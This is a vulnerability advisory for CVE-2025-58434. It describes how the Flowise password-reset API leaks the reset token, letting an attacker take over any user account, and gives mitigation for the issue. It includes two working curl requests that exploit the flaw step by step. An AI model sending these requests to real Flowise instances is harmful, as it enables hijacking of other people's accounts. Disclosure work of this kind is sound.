Critical | CVSS 9.8 | Account Takeover | CVE-2025-58434
Published August 2025
Flowise Account Takeover via Token Leakage
BugBunny.ai discovered a critical vulnerability in Flowise (43,000+ GitHub stars, acquired by Workday) that allows complete account takeover through token leakage in the password reset flow. The temporary reset token is returned in the API response, enabling attackers to reset any user's password.
Responsibly Disclosed
TL;DR
Password reset token leaked in API response
Impact: Complete account takeover of any user account
Vector: Attacker triggers forgot-password for the victim; the reset token is returned in the API response
Surface: Local and cloud Flowise deployments with password auth enabled
Status: Fixed in Flowise v2.1.0
Attack Flow
- Attacker sends a POST to /api/v1/account/forgot-password with the victim's email
- The API response includes the tempToken in the JSON body
- Attacker uses that token to call /api/v1/account/reset-password
- The victim's password is changed to the attacker's chosen password
- Attacker logs in as the victim with full account access
Step 1: Trigger Password Reset
curl -i -X POST https://<target>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<victim@example.com>"}}'
# Response excerpt (201 Created)
{
"user": {
"id": "<redacted-uuid>",
"email": "<victim@example.com>",
"tempToken": "<redacted-tempToken>",
"tokenExpiry": "2025-08-19T13:00:33.834Z"
}
}

Step 2: Reset Password with Leaked Token
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<victim@example.com>",
"tempToken":"<redacted-tempToken>",
"password":"NewSecurePassword123!"
}
}'

Mitigation
- Upgrade to Flowise v2.1.0 or later immediately
- The fix removes the token from the API response
- Tokens are now only sent via the email delivery mechanism
Credits & Disclosure
Identified by BugBunny.ai and responsibly disclosed to the Flowise maintainers.
Reporter: BugBunny.ai | CVE-2025-58434 | Flowise 43k+ stars